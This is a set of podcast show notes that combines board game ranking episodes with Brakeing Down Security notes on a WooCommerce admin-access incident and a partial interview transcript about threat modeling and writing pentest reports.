In this special episode, dad Micke and HCM Marcus "Brisse" Brissman go through their top 100 board games. Now they continue with nos. 60-41. At the top 10, HCM Tomas will join them :D. Games mentioned: Empires: Age of Discovery, Vampire: The Eternal Struggle, Village, Istanbul, Time's Up! Title Recall!, Joking Hazard, Star Wars: Rebellion, Warhammer: Invasion, Gloomhaven, Specter Ops, Santa Maria, Jaipur, Azul, Hollywood, Keyflower, 7 Wonders Duel, Mobster Metropolis, Legacy: The Testament of Duke de Crecy, That's Pretty Clever, Teenage Mutant Ninja Turtles: Shadows of the Past, Letnisko, Orléans, Planet, Trails of Tucana, Crown of Emara, Race For The Galaxy, Jump Drive, Rajas of the Ganges, Deception: Murder in Hong Kong, Dead of Winter: A Crossroads Game, Draftosaurus, Game of Thrones: Westeros Intrigue, Point Salad, The Big Idea, Colosseum, Roll Player, Coup, The Golden Sails, Junk Art, Bloodrage, Android Netrunner, Orléans Stories, Monikers, Cards Against Humanity, San Juan, Tiny Towns, Warhammer Conquest, bloodbowl team manager, Blood Bowl, Descent, Fury Of Dracula, Letters from Whitechapel, Key To The City Of London, Patchwork, Dungeons And Dragons, Godfather Don Corleons Empier, Twice As Clever, Spyfall, Viceroy.
The website for ranking your top 100 board games: https://rankingengine.pubmeeple.com/?fbclid=IwAR3OZPtgDvKPcoQ-17HqPFuOpzpvIvD5vzPGsn7-UQmMfn_tAOii4yiMfkg
Micke's list: 60. Empires: Age of Discovery https://boardgamegeek.com/boardgame/173442/empires-age-discovery 59. Vampire: The Eternal Struggle https://boardgamegeek.com/boardgame/2122/vampire-eternal-struggle 58. Village https://boardgamegeek.com/boardgame/104006/village 57. Istanbul https://boardgamegeek.com/boardgame/148949/istanbul 56. Time's Up! Title Recall! https://boardgamegeek.com/boardgame/36553/times-title-recall 55. Joking Hazard https://boardgamegeek.com/boardgame/193621/joking-hazard 54. Star Wars: Rebellion https://boardgamegeek.com/boardgame/187645/star-wars-rebellion 53. Warhammer: Invasion https://boardgamegeek.com/boardgame/47185/warhammer-invasion 52. Gloomhaven https://boardgamegeek.com/boardgame/174430/gloomhaven 51. Specter Ops https://boardgamegeek.com/boardgame/155624/specter-ops 50. Santa Maria https://boardgamegeek.com/boardgame/229220/santa-maria 49. Jaipur https://boardgamegeek.com/boardgame/54043/jaipur 48. Azul https://boardgamegeek.com/boardgame/230802/azul 47. Hollywood https://boardgamegeek.com/boardgame/904/dream-factory 46. Keyflower https://boardgamegeek.com/boardgame/122515/keyflower 45. 7 Wonders Duel https://boardgamegeek.com/boardgame/173346/7-wonders-duel 44. Mobster Metropolis https://boardgamegeek.com/boardgame/199646/mobster-metropolis 43. Legacy: The Testament of Duke de Crecy https://boardgamegeek.com/boardgame/52461/legacy-testament-duke-de-crecy 42. That's Pretty Clever https://boardgamegeek.com/boardgame/244522/s-pretty-clever 41. Teenage Mutant Ninja Turtles: Shadows of the Past https://boardgamegeek.com/boardgame/180771/teenage-mutant-ninja-turtles-shadows-past
Marcus's list: 60. Letnisko https://boardgamegeek.com/boardgame/126000/letnisko 59. Orléans https://boardgamegeek.com/boardgame/164928/orleans 58. Planet https://boardgamegeek.com/boardgame/252929/planet 57. Trails of Tucana https://boardgamegeek.com/boardgame/283864/trails-tucana 56. Crown of Emara https://boardgamegeek.com/boardgame/256570/crown-emara 55. Race for the Galaxy (/Jump Drive) https://boardgamegeek.com/boardgame/28143/race-galaxy https://boardgamegeek.com/boardgame/205597/jump-drive 54. Rajas of the Ganges https://boardgamegeek.com/boardgame/220877/rajas-ganges 53. Deception: Murder in Hong Kong https://boardgamegeek.com/boardgame/156129/deception-murder-hong-kong 52. Dead of Winter: A Crossroads Game https://boardgamegeek.com/boardgame/150376/dead-winter-crossroads-game 51. Draftosaurus https://boardgamegeek.com/boardgame/264055/draftosaurus 50. Game of Thrones: Westeros Intrigue https://boardgamegeek.com/boardgame/155693/game-thrones-westeros-intrigue 49. Point Salad https://boardgamegeek.com/boardgame/274960/point-salad 48. The Big Idea https://boardgamegeek.com/boardgame/696/big-idea 47. Colosseum https://boardgamegeek.com/boardgame/27746/colosseum 46. Santa Maria https://boardgamegeek.com/boardgame/229220/santa-maria 45. Roll Player https://boardgamegeek.com/boardgame/169426/roll-player 44. Legacy: The Testament of Duke de Crecy https://boardgamegeek.com/boardgame/52461/legacy-testament-duke-de-crecy 43. Coup https://boardgamegeek.com/boardgame/131357/coup 42. The Golden Sails https://boardgamegeek.com/boardgame/193327/golden-sails 41. Junk Art https://boardgamegeek.com/boardgame/193042/junk-art
Our links: Website https://mindy.nu/ Facebook https://www.facebook.com/Mindypodd.nu/ Twitter https://twitter.com/MindyPodd Youtube https://www.youtube.com/channel/UCmOr6MyeugbWX_VnckgGkDQ?view_as=subscriber Instagram https://www.instagram.com/mindypodd/?hl=sv Our Patreon https://www.patreon.com/user?u=2776677 Micke's mail Micke@mindy.nu Tomas's mail conradargo@gmail.com Marcus's mail brisse@spelraido.se
Tomas's links: Facebook https://www.facebook.com/groups/205615756115993/ Youtube https://www.youtube.com/channel/UCFyJceQ4JsiUhkS04K29Crg Instagram https://www.instagram.com/conradargo/?hl=sv Twitter https://twitter.com/ConraDargo
Marcus's links: Facebook https://www.facebook.com/spelradio/ Website http://spelradio.se/page/7/?fbclid=IwAR1qsAuQbPaViCaNdAaRjAhcCSH-tcZxDOFjQJ1h1B_KWpZB8THkoP_SZbw
In Episode 28 we talk about some of our recent plays. We review the latest Alexander Pfister game Maracaibo. Then we discuss some of the top games on BoardGameGeek numbers 100-76. 00:58 Everdell 7:43 Codenames: Pictures 8:44 Flamme Rouge 11:50 Race For the Galaxy 13:19 Qwirkle 14:15 The Taverns of Tiefenthal 23:29 Just One 29:20 Targi 31:41 Specter Ops 39:07 Maracaibo Review 1:29:25 BGG top 250 #100-76
Ambie and Crystal discuss Letters from Whitechapel, Trogdor, and Gem Hens. We then talk about hype in board games and whether it's good or bad, or both. Announcements: 0:43 Recent Games: 1:48 Hype: 13:42 Outro: 29:17 Bloopers: 30:30 Letters from Whitechapel: https://boardgamegeek.com/boardgame/59959/letters-whitechapel Trogdor!! The Board Game: https://boardgamegeek.com/boardgame/255907/trogdor-board-game Gem Hens: https://boardgamegeek.com/boardgame/260015/gem-hens
Announcements: https://www.workshopcon.com/ SpecterOps (red team operations) and Tim Tomes (PWAPT) Bsides Nashville https://blog.secureideas.com/2019/04/we-take-security-seriously-and-other-trite-statements.html “We take security seriously and other trite statements” WordPress infrastructure (supply chain failure) WordPress plugin called WooCommerce was at fault. Vuln late last year: https://www.bleepingcomputer.com/news/security/wordpress-design-flaw-woocommerce-vulnerability-leads-to-site-takeover/ “According to new research by Simon Scannell, a researcher for PHP Security firm RIPS Tech, when WooCommerce is installed it will create a Shop Manager role that has the "edit_users" WordPress capability/permission. This capability allows users to edit ANY WordPress user, including the Administrator account.” “https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/” You (Kevin) discovered the admin accounts, but could not remove them. Was that when you considered this an ‘incident’? Timeline: “[2019-03-22 09:03 EST] Kevin assigns members of the Secure Ideas team with reconnaissance and mapping of the AoM system. Kevin reminds these members that Secure Ideas doesn’t have permission to test AoM. They are advised not to do anything that could harm the AoM’s production environment.” What is the line they should not cross in this case? You did not have access to logs, you asked that an audit plugin be installed to be able to view logs. Is that permanent, and why did they not allow access to logs prior to? [2019-03-22 13:11 EST] AoM Support fixes the audit log plugin access. AoM Support has found that a purchase of a course through a Woocommerce plugin resulted in users being granted admin access. AoM Support provides specific order numbers. They have also done an analysis of the database backups from the last 60 days and believe that the attackers did not do anything after they got access. 
AoM Support announces that the Secure Ideas training site will be set up on a separate server and Secure Ideas will be granted a new level of access. Seems like working with AoM wasn’t difficult. Was giving you access to your own instance, and allowing you to administer it a big deal for them? Lessons Learned? Anything you’d do differently next time? Update IR plan? Did they reach out for additional testing? Did the people who got admin get removed? Consult with AoM on better security implementation? Your env wasn’t damaged, but did they suffer issues with other customers? *answered* https://www.wordfence.com/ https://en.wikipedia.org/wiki/Gremlins Gas Station skimmer video - https://www.facebook.com/michellepedraza.journalist/videos/2135141863465247/ https://www.helpnetsecurity.com/2019/04/12/cybersecurity-incident-response-plan/ https://www.guardicore.com/2018/11/security-incident-response-plan/ https://www.zdnet.com/article/security-risks-of-multi-tenancy/ Upcoming SI events IANS forum (Wash DC) ShowmeCon Webcasts ISC2 security Congress (Wash DC) Patreon Slack Twitter handles iTunes Google Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! 
Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Announcements: WorkshopCon Training with SpecterOps and Tim Tomes www.workshopcon.com red team operations with SpecterOps PWAPT with Tim Tomes Source Boston: [Boston, MA 2019 (April 29 – May 3, 2019)](https://sourceconference.com/events/boston19/) Trainings: April 29 - April 30, 2019 | Conference: May 1 - 3, 2019 Cybernauts CTF meetup in Austin Texas at Indeed offices, 23 April at 5pm Central time. https://nakedsecurity.sophos.com/2019/04/02/wrecked-teslas-hang-onto-your-unencrypted-data/ My last car sync’ed the contact list. Video is a different story, but safety for the vehicle and owner, they’ll probably continue to store it. Telemetry data is for changing road conditions, navigation, etc. Enable encryption at rest… or pop a fuse to scram the data when/if an accident is detected Level of difficulty, no fuse, requires hardware upgrade Encryption at rest, ensuring HTTPS on all incoming/outgoing. https://www.bleepingcomputer.com/news/software/major-browsers-to-prevent-disabling-of-click-tracking-privacy-risk/ Annoying “do you want notifications from this site?” Like an annoying RSS feed… ‘Hey, we added a new banner ad!’ https://www.phoronix.com/scan.php?page=news_item&px=Linux-Improve-CPU-Spec-Switches Why add the switches to allow vulnerabilities? Slippery slope --disable-dirtycow? https://www.bleepingcomputer.com/ransomware/decryptor/planetary-ransomware-decryptor-gets-your-files-back-for-free/ https://www.wamc.org/post/details-still-few-city-albany-s-ransomware-attack Threat intelligence and software detections… Got an email… *Story Time from Mr. Boettcher* Twitter: why do companies not allow copy/paste in password fields? Tesla
Thanks to all of our awesome Patreon supporters, the Dukes are able to bring you additional interviews of publishers, designers and board game media personalities for our Holding Court episodes. This episode, Alex sits down with Emerson Matsuuchi - the designer of Specter Ops, Century Spice Road and the upcoming Metal Gear Solid from IDW Games! The two discuss board game design and of course what flavor of ice cream Emerson would be! Click here to Twitter: @dukesofdice Facebook: /dukesofdice Dukes of Dice YouTube Channel Subscribe on iTunes
Log-MD story SeaSec East meetup Gabe (county Infosec guy) https://www.sammamish.us/government/departments/information-technology/ransomware-attack-information-hub/ New Slack Moderator (@cherokeeJB) Shoutout to “Jerry G” Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407 www.Workshopcon.com/events and that we're looking for BlueTeam trainers please Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet Noid - @_noid_ noid23@gmail.com Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3 Slides (PDF) https://github.com/noid23/Presentations/blob/master/BSides_2019/Its%20Not%20a%20Bug%20Its%20a%20Feature%20-%20Seattle%20BSides%202019.pdf Security view was a bit myopic? “What do we win by playing?” Cultivating relationships (buy lunch, donuts, etc) Writing reports Communicating findings that resonate with developers and management Often pentest reports are seen by various facets of folks Many levels of competency (incompetent -> super dev/sec) Communicating risk? Making bugs make sense to everyone… The three types of power: https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1 (yas!)
Transcription (courtesy of otter.ai, and modified for readability by Bryan Brake)
Bryan Brake 0:13 Hello everybody, this is Bryan from Brakeing Down Security. This week you're gonna hear part two of our interview with Noid. We did a lot of interesting discussions with him and it went so well that we needed the second week, so for those of you here just catching this now, Part One was last week, so you can just go back and download that one. 
We're going to start leading in with the "one of us" story because one of the one of the slides he talked about was how, you know, he, you know, learned how to be one with his dev team. And one of the last topics we had was kind of personal to me. I do a lot of pentest writing for reports and stuff at my organization "Leviathan" and and you know, we talked about, you know, what makes a good report, how to write reports for all kinds of people, whether it be a manager that you're giving it to, from an engagement for a customer, or, you know, the technical people who might be fixing the bugs that an engagement person might find, or a pen tester might find in this case. So, yeah, we're we're going to go ahead and lead in with that. Before we go though, SpecterOps is looking for people to go to their classes. They're learning adversary tactics and red team Operations Training course in Tysons Corner, Virginia. It's currently $4,000 to us and it's from April 23, April 26 of this year 2019. That doesn't include also airfare and hotel, so you're gonna have to find your way to Tysons Corner, the Hyatt Regency. There's a link in the show notes, of course, to the to the class if you'd like to go. You'll learn things like designing and deploying sophisticated resilient covert attack infrastructure, gaining initial access footholds on systems using client side attacks, and real world scenarios cutting edge lateral movement methods to move through the enterprise and a bunch of other cool things... So yeah, if you're interested in and hooking that up you can you there's still you still got more than a month to sign up for it. It looks like there might still be tickets, so knock yourselves out. They're also looking for blue team people. "Mike P" on our Slack channel, which will tell you about the end of the show here on how to join if you'd like, he said http://www.workshopcon.com/events they're looking for blue team trainers... 
you can hang out with folks like, you know, SpecterOps and Tim Tomes (LanMaster53) as well there when you you know we can you sign up for the blue team stuff and yeah http://www.workshopcon.com/events and then you can, you know, learn to be a blue team trainer or actually give blue team training if you so choose. So that said it's pretty awesome. Alright, so without further ado, we're going to get started with part two of our interview with Noid here, hope you have a great week. And here we go. Okay. So I think we've gotten down to like the "one of us" story. So we're in our hero finally starts to get it and begins to bridge the gap. Some of the things some of the points are the lessons learned in this story. And you can tell us about story was that language makes all the difference in the world. This is what got me on to the part about the reporting, which we'll talk about a little while, but maybe you could fill us in on this discovery, this the story that got you to these points.
Brian "Noid" Harden 3:37 Okay, so the team I'm working on I get asked the the thing in question is it was a pretty massive product and it had never had any threat modeling done,
Bryan Brake 3:50 okay.
Brian "Noid" Harden 3:51 So had never had any threat modeling done and this this particular product was made up of tons of little sub products. So what I did is I sat there first in a kind of a complete panic going, this is overwhelming. I don't have nearly enough time or resources to be able to do this. But you know how to eat the elephant, right? The small pieces and get at it. So I had one dev lead, who I know, had worked previously on a security product. And he was a nice guy. So I sat down with them and basically said, "Hey, could you walk me through visually diagramming how your service works, building that data flow diagram, and then we're going to talk about it from a security perspective". And he was sort of like, oh, that'd be fun. Yeah, let's do that. 
And so we sat there and he diagrammed and the whole time he's diagramming, he'd stop and erase things and go, Wait, no, no, we were going to do it that way. But we didn't. And then oh, and we stopped doing it this way, because we added this other thing and we had to be able to break communication out number channels and then he stopped at one point and was like, get a picture of this was like I think this is probably the most accurate diagram of our service we've ever had. And then when we started doing the threat modeling side of it, like, you know, talking about trust boundaries and you know, it's like all right, so what makes sure that you know data from point A to point B and it's not filled with that kind of thing? And I'm saying okay well, could you could you you know, do this over HTTPS rather than just regular HTTP
Bryan Brake 5:29 right
Brian "Noid" Harden 5:31 you know you get non repudiation you know, and it's like, not talking about even the security value of it, but talking more about the you know, you the integrity be there and then at one point, he stops and he looks at me and he says, Man, I never had a threat modeling would generate so much feature work. And in my mind, I was like, talking about feature work like, these are bugs you need to fix. Now, all of a sudden, it was like, Oh, crap, I've been approaching this entirely the wrong way my entire career. Devs look at things that have looked at depth look at things from bug fixing, and feature development. And as a security person, what I, every time I'd been bringing up stuff they needed to do in my mind, it was implied it was feature development. But they saw this bug fixing, because in the "dev world" security fixes or bug fixes. He saw the value here and went, Oh, this is going to generate a ton of feature work. And it's like, oh, so I gotta stop calling the security work. I've got to start calling this feature work. And sure enough, not only if you start calling it feature work. 
And of course now once you're talking about feature work, you can start talking about the drivers. Why are we building a feature because you know, you don't build features nobody wants. Unless you're certain software companies. But yeah, but you build.. you build features that come out of customer requests, you know, you get features that hey, you know, I look at things like say Microsoft Office, how that's evolved over the years. And that's because people who use Office come back and say, you know, this is really cool. But I'd really like it if when I'm giving my PowerPoint presentation, I had a timer on the screen. So I know I'm on mark, you know, and Okay, that's a feature requests. And so that's how these things evolve. And so once I started talking about security work from the perspective of feature development you know, we have existing features that need to be worked on to give them new functionality in order to be able to pick up new customers and we have new features that we need to build that will also help because the other thing too I also noticed is that well... well I care about things like confidentiality and integrity. Devs care about things like availability and performance, right, these two these two things can kind of be almost used interchangeably, depending on the circumstance, so when, when devs are talking about stability, I'm thinking about integrity. When I'm when I'm talking about availability, they're, they're thinking about performance. And so all of a sudden, I'm now giving them ideas for like new proof counters, basically, like new metrics to check the health of the thing that we're building. And the way I looked at it was almost... Yeah, this is what this is the business driver for the, you know, customer X wants it customer Y needs it, you know, and here's the benefit, you know, the product gets out of it. Here's the benefit that developers get out of it. And what a security get out of it? Hey, don't worry about it. 
Purely, purely any value I derived from this work is purely coincidental.

Brian Boettcher 8:57 *Chuckles*

Brian "Noid" Harden 9:00 And that, in turn, helps start driving the conversation a lot better. Because the other value I got out of it, too is by having somebody on the development side of the house who had a name and had some, you know, reputation behind him, he was able to go to his respective peers and say, Man, I did this thing with Noid and it was really valuable. And we got a lot of cool stuff out of it. So he's gonna hit you up about it. And I totally recommend doing

Bryan Brake 9:27 right

Brian "Noid" Harden 9:28 and at which point because because some of the folks I worked with were either indifferent towards me, they were just busy. I did have some folks that I work with, though, that were just flat out adversarial towards me. They frankly they didn't want me doing what I was doing. They didn't really want me parking and poking around like the dark corners of the product. You know, because it was going to make work, but having somebody on their side say, No, I actually got value out of this. Okay, well, I'll give it a try. Holy crap, I got value out of this, too. So that was that was where I suddenly realized that my language, in my mind, I'm not saying anything differently. But yet, it turns out that when it comes to the words coming out of my mouth and how they were being received, it radically changed how I was expressing myself to people. And it totally changed the response I got.

Brian Boettcher 10:26 So maybe we need a new "CIA" triad that has the other words on it, you know, the, the translated words for development and product teams,

Brian "Noid" Harden 10:35 possibly!

Bryan Brake 10:36 performance... integrity is stability.

Brian "Noid" Harden 10:43 Yeah, stability. availability...

Bryan Brake 10:48 What's confidentiality then? what does the other bit that they talk about or worry about?
Brian "Noid" Harden 10:52 I don't know if only we had a dev lead on this call.

Brian Boettcher 10:55 *chuckles*

Bryan Brake 10:56 Yeah. Do you know one? *laughs*. So, so the lessons learned, you said, language makes all the difference. You know the way you speak is like, you know, if you're, if you only know English, like most Americans and go over to France, speaking louder in English to somebody who only speaks French is not going to help here to help you so "look for the helpers" So let's say you don't, let's say we're not lucky enough to have somebody like the person you found in your organization is is it it's going to take a little bit longer maybe to get them onto your side to you know, poke at him like that or, you know, maybe grease the wheels with some donuts or you know, maybe take them to lunch or something. Would that be helpful at all?

Brian "Noid" Harden 11:35 Well, first off Yes, you'd be amazed at how much showing up with donuts

Bryan Brake 11:48 Oh, I know

Brian "Noid" Harden 11:49 Oh yeah. No, actually actually it's funny too because I actually just a couple of weeks ago another team at my company came over and gave my team donuts They gave my team the IT team and the tech team donuts because of all the work we've been putting in form... as far as I'm concerned. Yeah, I'll march directly into hell for those people right now, because they gave me donuts...

Bryan Brake 11:56 niiiice. they better be Top Pot donuts or something legit not like...

Brian "Noid" Harden 12:13 Oh, yeah, they were. They were Top Pot donuts. But yeah, so part of its that something else, too is doing some of the work yourself. So, in addition to all this work I'm doing I'm also managing the development of security features. And I had gone over the product spec for one of these security features. And I built a data flow diagram. And then during one of my little weekly Scrum meetings where I sit down with my devs. I showed it to them.
and I remember one of them to and he immediately stopped and was like, "What is this?" He's like, "what is this doesn't make sense",

Bryan Brake 12:53 This is forbidden knowledge This is your thing.

Brian "Noid" Harden 12:56 Yeah, you wrote this. Okay, you wrote this, this is just a visual representation of the thing that you wrote. And once I explained it him, sort of the steps one through eleventy, you know, and showed him what had happened. He was sort of like a "Oh, that's interesting". Still somewhat dismissive of it, but it was still kind of a file. So in addition to, you know, buttering people up with donuts, and lunch and things like that, but also sometimes you gotta just buckle down and do it yourself, and then show the value. And I mean, I'll be blunt. That's how I've gone by through most of my career is when I can't get traction. I'll go do it. And then pop up and go. Hey, guys, check this thing out. Oh, wow. That's really neat. How do you do that? Where did you do that? It's like oh, you can do it too. Right now I can show you how I can work with you on it. I'm certainly not going to tell you to RTFM and walk out of the room. So part of it is it also shows a little bit of commitment on your part, sort of one of the things I've picked up that security, not even in the equation here. But just having worked in a lot of software development organizations with the devs and the PMs is the devs is frequently see the PM is not doing anything of value except for when you are. So when you are willing to put that kind of effort into deliver something like that, like, Hey, I thought modeled our service, it sort of shows this, "oh, I take it back. All those things I said about you know, you're not worthless after all." So there's definitely some value there too, because a lot of times too people are willing to say because it's easy to stand back and issue edicts, it's easy to stand back and just, you know, get up on your soapbox and tell everybody else what to do.
But when you're when you show you're willing to eat your own dog food. That really gets people's attention because it's like, "Okay, this dude clearly cares about this a lot" And now that he's done it, I see what he's talking about. Yeah. You know, like we should do that there's value here.

Bryan Brake 15:11 So very cool. Yeah. So when you on the last slide here, when you wrapped it all up, you said engage early and often... Does it have to be so when we're talking about communication, open communication, trying to, you know, some of its, you know, cultivating relationships. So, you kind of need to, you know, if you're introverted, you kind of need to step out of your shell a little bit and go and talk to people, get out of your cubes for once a while. Turn on the lights, that kind of thing. How often did you talk with these teams to help build this relationship after a while, because obviously there had to be some team building there?

Brian "Noid" Harden 15:48 Yeah, so in my case, since I was in the team, we thought weekly, okay, weekly, and sometimes daily because they were literally down the hall from me, right, but in terms of where I've had to work in other organizations Where I've been in back in a centralized organization and having to work with remote teams or work with teams that I'm telling them to do things but I'm not in their org... like a weekly basis okay like we're going to meet up this week because like for example like when I was a back when I was at Microsoft I worked in the MSRC before I left yeah and I was handling me and another guy we're handling all the (Internet Explorer) IE cases. Okay. That was a lot of cases because there's a lot of versions i right. So we would go meet with those cats once a week. And we would sit down with them and say, Okay, here's here's the queue. Here's what's new from last time.
You know, here's sort of what we think is the priority for fixing things you know, what do you think about it, but it's it's that you always want them to know who you are, and you want them to know that you're just as busy as they are, and that you end that you're also respectful of their time, right? You know, so we'd make the meeting short... personal pet peeve of mine are people that set meetings deliberately long with the expectation of all just go ahead and give everybody 30 minutes. I'll give everybody 30 minutes back, right? Like, well thanks jerk. Like how about you could have just made a 30 minute meeting in the first place? You know it just tells that that that tells me you're not that doesn't tell me you're a magnanimous person that tells me you can't manage your time, you know. So I try to be really concise. Like, I'm going to set up a meeting with these devs. I'm going to include the agenda in the meeting invite. I'm going to set it for exactly how long I think it's like we're going to 30 minute meeting, you know, 30 minute meeting to go over the bugs that are in the queue. There's four new ones from last week one of them's really nasty, you know, that probably is probably going to be a non negotiable.. You know, but the other three are up for negotiation and you show up you sit down with them you know some pleasantries and then you just, you get to work and then you get them back out doing their thing and you get back to your thing. And that really flows well... It really flows well because, you know, none of us like meetings. And the closer you are to touching computers, the more meetings disrupt your flow the more they just disrupt your life and the thing that you're effectively getting usually paid a lot of money for. And so by kind of doing it that way, you keep that cadence up to keep that that sort of friendship and that that rapport up but the other thing too is a another point I wanted to make, but I'm getting tired...
but yeah, but but along those lines to Yeah, you get that rapport there. You're respectful of their time and then you... I can't remember what I was going to say next.

Bryan Brake 19:20 So the last bit was, let's see, don't talk about securities, talk about feature development. We talked about that threat modeling your developers, you and Dr. Cowan, my, my car pool buddy, you and Crispin need to you know get get together and talk about the the threat modeling he's doing... he doesn't do trust boundaries so much, one of the talk he gave at SeaSec East was about how we do threat modeling in our organization but a lot of companies are starting to see value in that before we do engagements because we can prioritize what's the more important thing to test versus just testing all the things in the environment

Brian "Noid" Harden 19:42 Threat modeling and software development is huge too, like that was one of the one of the things I think a lot of my developers I've done this with over the years have taken away from it is one you have to make it fun... You can't make a complete slog. But one of the nice things about threat modeling, is when you're visually looking at the thing you're going to build, that's when you make the realization that like, Oh, hey, my post office has no door... You know, and it's like the best time to figure that out. Then you always like, I always tell people that. Yeah, the best time to fix a bug is an alpha before you write anything... And the next best time to fix it is before it goes into production. And the worst possible time to fix a bug is after I've been in prod for 10 years, and it's a it's a load bearing bug at this point. It has dependencies on it

Bryan Brake 20:30 you know what, it's funny you mentioned that I've been seeing some like Linux kernel bugs they said there was one in there for like 15 years old at affected all of like 2.6.x to up to the latest version.
It was a use after free bug, you know that I don't know if they found the bug 15 years ago and just never fixed it but yeah, bugs like that sit in there because people don't don't check for that kind of stuff...

Brian "Noid" Harden 20:51 that happens sometimes those the well I mean, God remember that. Remember the whole SYN flood thing in the 90s? Yeah, I mean it was it was it was in the RFC... One of those like, like, Oh, we found the bug. It's like what? You read the RFC. And just finally understood it. You know, so it's, it's that stuff. And there was an SSH bug that popped up recently. Yep. It was the same thing. It wasn't a terribly nasty critical bug. But it was, in a piece of code that had been in SSH for ever.

Bryan Brake 21:26 Yeah. I seem to remember that one, too. Yeah. I'll have to find a link to that one. So I know you're getting tired. I have one other topic I'd like to discuss because I do a lot of report writing. Well, I I probably should do a lot of report writing but at Leviathan we you know we're the PM grease the wheels we you know, work with a relationship with the the status meetings, we do the executive summary and such and I could be better writing reports some of our testers are way better at it than I am... You know, taking the taking the whole idea of the language and where where things go with this, when we, when we put findings out, we've won, we call them bugs where we call them findings, not necessarily bugs.
But what I'm trying to figure out is how we can better communicate our reporting, when we're doing things like readouts, to you know, kind of resonate with both developers and management because the idea is the executive summary is supposed to be for the "managers" or senior folk and then we have like, you know, components that drill down and talk about specifics and be more technical, but, you know, often we find ourselves and I find myself because I come from a more technical background writing more technical to the executives and my question was, Is there ways of communicating risk to both the developers and the managers in the, you know, using using somewhat the same language? Or should we call the bug not bugs or not findings. We call them, you know, hey, here's a feature you guys should implement, which would be, you know, HTTP or, you know, you must have seen a few pen test reports in your time. And I mean, what is what is your opinion of pen test reports?

Brian "Noid" Harden 23:13 So, my opinion, the most pen test reports, is that they're garbage... Well, they're usually written to, they're usually written to one extreme or the other. So unfortunately, I have yet to find any really good language that appeases everybody.

Brian Boettcher 23:30 So what's the one extreme or the other?

Brian "Noid" Harden 23:32 What are the two extremes they're either hyper technical, the sort of stuff that like any of the three of us would probably look at and go, Okay, I get it, right. I understand the value here or there so high level that if I'm a business person, I might be sitting there going, Hey, okay, you know, you've you've reached out you've touched my heart. I understand that this this is a critical like this is a big issue we need to get fixed. But there's not enough meat there that if I took that report and handed it off to my dev lead and said, go fix this. The dev lead is going to sit there and go...

Brian Boettcher 24:09 Are you kidding me?
Brian "Noid" Harden 24:10 Yeah. Like, I don't know what to fix, according to this report says bad things can happen on the network. Are you telling me to go prevent bad things from happening on the network? So that's the thing. I find that Yeah, they either overwhelm you with details or there's not enough substance to them. Okay, so every once in a while, you get a really good one though, you get a you get a you get a really good one. If I could look at just a shout out to Coalfire actually, like their reports.

Unknown 24:39 I mean, okay, So, What is a happy medium type report for you? One that would satisfy the manager folks but also get with, you know, be technical enough. What kind of things would you like to see in reports that you get from them and feel free to you know, talk about the Coalfire thing I guess

Brian "Noid" Harden 25:02 *Chuckles*

Bryan Brake 25:06 *Chuckles* We're always trying to improve our reports that Leviathan we've gone through and done things like test evaluations and you know things like that and no it's fine you know they're they're cool with me doing my podcast on the side so but if you had when you get reports... the good ones... What do they look like well I mean what what kind of things that you're looking for and and and in a pen a proper pentest report?

Brian "Noid" Harden 25:30 Well for me being a technical person one of the things... the biggest thing I'm looking for in a report repro steps, right? If you haven't given me clear repro steps, then you have given me a useless report and that's the thing I've seen reports were basically it's... you know, hey man, we all we popped your domain controller you know, we did this we did that. Look at all freaking awesome we are... And you're like, Okay, I didn't hire you guys to be a circus sideshow. I hired you guys to show me where my risk is, and so I can focus my I know where to focus my efforts.
And so those types of so those types of like, "look at how badass I am" reports don't do anything for me... what I do like there were reports that say hey you know we found a cross site scripting vulnerability on this particular product in this particular area. And here is not only screenshots of the cross site scripting vulnerability happening, but here's the repro steps because what's going to happen is, for example, you know, I see something like that and I go, Well, we got to fix that. I'm going to go to my developers. And the first thing my developers are going to ask me is, can you repro it? Can I read through it because one of the things they're going to do is after they fix it, they're going to validate the fix if they don't know how it was exploited in the first place. They're not going to know how to validate the fix. So being able to provide that information... down is is huge for me. Um, but then again, I'm also not, you know the business guy, I'm not the big money guy, I'm I want my report to be technical right so would the executives of my company get the same value out of the report? I probably not... you know when you're talking to the much higher level non technical people what you need to be doing is you need to be making sure you're talking in terms of risk. Sure, you know, you're talking in terms of risk and you're talking in terms of a not technical risk... You know, at the end of the day, the CEO of the company doesn't give a damn that SMBv1 is still on the network, right? They might not even know what that is, right? Odds are I'm gonna I'm gonna go out and say they probably don't know what that is. Um, and even in that doesn't mean explain to them what it is because they're not going to care so first. We're going to go from not knowing what it is to not caring what it is.
But if you express things in terms of risk of that, you know, the current network architecture, as it stands is very fragile and could be easily brought down, you know, through almost potentially accidental behavior, let alone malicious behavior. You know, resulting in outages and SLA violations right now, you got their attention, because what they hear there is also if I don't fix this, it might cost me money.

Brian Boettcher 28:36 profit loss.

Brian "Noid" Harden 28:37 Yeah, and that's the thing. It's the, you know, depending on where they're at, in the org structure, you know, I've been in I've been in plenty of organizations before where downtime... downtime is bad... downtime is just, I mean, downtime is never good. But I mean, I've been in organizations where it's like, okay, so I just got promoted to like, super uber director guy. 48 hours into the gig. You know, we had like, a two hour outage... I'm done.

Bryan Brake 29:08 Busted that SLA, big money...

